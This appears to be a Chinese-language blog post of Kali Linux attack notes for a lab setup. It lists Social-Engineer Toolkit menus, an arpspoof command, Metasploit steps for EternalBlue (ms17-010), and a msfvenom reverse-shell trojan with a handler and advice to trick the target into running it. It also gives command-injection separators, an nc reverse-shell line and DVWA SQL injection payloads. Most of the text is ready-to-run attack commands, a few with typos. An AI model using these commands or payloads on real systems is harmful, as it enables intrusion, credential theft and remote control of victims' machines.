1 社会工程学 setoolkit
1)Social-Engineering Attacks:社会工程学攻击
1)Spear-Phishing Attack Vectors:鱼叉式网络钓鱼攻击向量
2)Website Attack Vectors:网页攻击向量
3)Infectious Media Generator:感染式媒介生成器
4) Create a Payload and Listener:创建Payload和Listener
5)Mass Mailer Attack:海量邮件攻击
6)Arduino-Based Attack Vector:基于Arduino的硬件攻击向量
7)Wireless Access Point Attack Vector:无线热点攻击向量
8)QRCode Generator Attack Vector:二维码攻击向量
9)Powershell Attack Vectors:Powershell攻击向量
10)Third Party Modules:第三方模块
99)返回到主菜单。
————————————————
2
2)Penestration Testing (Fast-Track):渗透测试(Fast-Track)
3)Third Party Modules:第三方模块
4)Update the Social-Engineer Toolkit:升级社会工程学工具包
5)Update SET configuration:升级SET配置
6)Help, Credits, and About:帮助等
2 arp欺骗
# ① 命令:arpspoof
# ② 网卡: eth0
# ③ 攻击ip:192.168.44.134
# ④:替换ipMAC地址:192.168.44.2
sudo arpspoof -i eth0 -t 192.168.44.134 192.168.44.2
3 msfconsole
① 安装 apt install metasploit-framework
② 永恒之蓝 漏洞实验 ms17-010
步骤:
msfconsole # 进入msf
search ms17-010 # 搜索永恒之蓝模块
use 0 # 有四种攻击方式,选择第一种。
show options # 查看需要的配置项,字段Required 为true,为必填项
set rhosts 192.168.1.1 # 设置靶机ip,可一次设置多个
set rport 445 # 设置靶机端口
set lhost 192.168.1.2 #设置攻机ip
set lport 1524 # 设置攻机端口、
run # 开始攻击,出现------win----为攻击成功
help # 查看可以控制靶机命令,控制完成
4 制作远程控制靶机木马
生成的木马会被杀毒软件直接清除
#步骤一 生成木马执行文件 ,将生成的exe执行文件想办法放入到靶机中。
# -p payload 载荷
# payload_name 系统/架构/作用/方法
# -f 格式
# -o output
msfvenom -p windows/x64/meterpreter/reverse-tcp lhost=192.168.0.1 lport=9999 -f exe -o test.exe
msfconsole
use exploit/multi/handler
show options
set plaload windows/x64/meterpreter/reverse-tcp # 负载方式、ip、端口需要和生成的执行文件一致
set lhost 192.168.0.1
set lport 9999
run
# 再通过别的手段让靶机双击执行文件,就攻击成功。
5 DVWA (web渗透机安装)
① dvwa安装路径:https://github.com/digininja/DVWA
② 安装phpstudy 2018年版本
③ 将dvwa文件放入phpstudy中的www目录中,将config.inc.php文件中的数据库用户名和密码修改为root/root,启动phpstudy服务,
④ 访问URL:http://localhost:80/dvwa ,在setup中创建数据库,访问账号密码:admin/password
6 DVWA_command 命令执行攻击
# 输入 127.0.0.1 测试环境
# windows可用分隔符: && || & |
# Linux 可用分隔符: && || & | ;
A; B //A不论正确与否都会执行B
A&B //A后台运行,A和B同时执行
A&&B //A执行成功后才会执行B
A|B //A执行的输出结果作为B命令的参数,A不论正确与否,都会执行B
A||B //A执行失败后才会执行B命令
7 扩展:nc工具(瑞士军刀)——反弹shell
# 实验功放机都为kali
# 攻机
nc -lvp 8888
# 靶机
nc 10.196.93.101 -e /bi/bash 8888
8 DVWA_SQL注入
# 注入查询用户名和密码
# union 联合查询
1' union select user,password from users#
'or 1=1 -- - #简单通用sql注入
① 使用sqlmap工具进行sql注入
9 信息收集
① Zenmap ip扫描
wait onl oad…
标签:常用,set,攻击,Kali,192.168,Attack,靶机,执行,攻击方式 From: https://blog.csdn.net/weixin_45793745/article/details/139380179